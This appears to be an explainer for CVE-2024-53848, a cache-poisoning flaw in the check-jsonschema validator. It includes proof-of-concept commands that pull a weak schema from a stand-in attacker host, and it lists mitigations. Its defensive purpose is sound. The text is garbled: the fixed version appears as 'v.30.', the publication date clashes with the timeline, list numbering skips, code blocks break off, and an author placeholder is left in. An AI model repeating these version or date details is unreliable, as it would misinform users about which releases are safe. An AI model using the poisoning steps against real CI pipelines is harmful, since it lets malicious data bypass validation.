Published: June 2024
Severity: Medium (Allows bypass of validation)
Affected Tool: check-jsonschema (before v.30.)
Fixed in: v.30.

What is check-jsonschema?

check-jsonschema is a popular command-line application and pre-commit hook used for validating JSON and YAML files against JSON Schema definitions. It's commonly used in CI/CD pipelines, open source projects, and anywhere data format validation really matters.

The Problem

The vulnerability lies in how check-jsonschema caches remote schemas for validation.

- When you validate a JSON file with a remote schema URL, e.g. https://example.org/schema.json, check-jsonschema:

Saves it in a cache file named after the last part of the URL (basename), e.g., schema.json.

- If you later reference any other remote schema with the same basename (even from a totally different host), check-jsonschema will re-use the cached file, regardless of its origin.

Attackers can abuse this by making you validate a schema from a malicious URL (same basename) and thus "poison" your cache. Next time you expect to validate against a legitimate schema, check-jsonschema could instead serve the attacker's version.

This is a type of cache confusion or cache poisoning attack.

Imagine you have a legitimate schema at

https://secure.example.org/schema.json

But check-jsonschema gets tricked into validating something against a malicious schema at

https://evil.attacker.org/schema.json

Attacker sends you a PR, task, or testing data referencing their evil schema URL.

2. When you validate it (e.g., as part of your normal pre-commit workflow), check-jsonschema caches the malicious schema.json using the basename, e.g. /tmp/check-jsonschema-cache/schema.json.
3. In the future, when you (or anyone on your machine/CI) try to validate against the original https://secure.example.org/schema.json, check-jsonschema silently picks up the cached malicious schema, incorrectly validating data and potentially letting "bad" data through.

1. Download and poison the cache

# Attacker's step: You are tricked into validating with their evil schema
check-jsonschema --schemafile https://evil.attacker.org/schema.json data.json

This stores the attacker's schema as schema.json in your cache dir (default is wherever check-jsonschema stores it locally).

2. Use the legitimate schema later

# Your normal validation step, expecting to validate against the real schema
check-jsonschema --schemafile https://secure.example.org/schema.json data.json

You think you used the legit one, but really... the malicious schema got used from cache.

Attack impact: Data that should have been rejected could now pass validation, possibly causing data quality, downstream, or security problems.

Proof-of-Concept (PoC)

Here's a short proof-of-concept showing how the cache can be poisoned and reused.

evil-schema.json (malicious schema)

{
  "type": "object",
  "properties": {
    "role": { "type": "string" }
  },
  "required": ["role"],
  "additionalProperties": true
}

strict-schema.json (secure, intended schema)

{
  "type": "object",
  "properties": {
    "role": { "type": "string", "enum": ["user", "admin"] }
  },
  "required": ["role"],
  "additionalProperties": false
}

1. Poison cache

# Cache the evil schema
check-jsonschema --schemafile https://evil.attacker.org/schema.json ./test.json

2. Now try to use the real schema

# But check-jsonschema picks up evil logic from cache!
check-jsonschema --schemafile https://secure.example.org/schema.json ./test.json

A malicious value like "role": "superadmin" passes, because it used the attacker’s weak schema, not yours.

Official References

- GitHub Advisory
- NVD
- Official Patch (v.30.)

Update check-jsonschema to v.30. or newer!

Patch changes the caching so it includes the full schema URL in the cache filename, preventing basename conflicts.

`bash

check-jsonschema --no-cache --schemafile https://example.org/schema.json data.json

`

2. Pin/restrict schema URLs:

`bash

check-jsonschema --cache-filename mysecure_schema.json --schemafile https://example.org/schema.json data.json

`bash

curl -LOs https://example.org/schema.json
check-jsonschema --schemafile ./schema.json data.json

CVE-2024-53848 is a cache confusion bug in check-jsonschema up to v.30..

- Attacker can “poison” your schema cache simply by getting you to validate their schema with the same basename.
- Always update to v.30.+, or use --no-cache, or validate explicitly on trusted schemas to avoid being tricked.
- Follow official advisory for latest info.


Stay safe! Always keep your CLI tools up-to-date and treat external URLs with care — especially when they control what validates your data.


*Author: [Your Name], Infosec Explainers – Exclusive Deep Dive series, 2024*

Timeline

Published on: 11/29/2024 19:15:09 UTC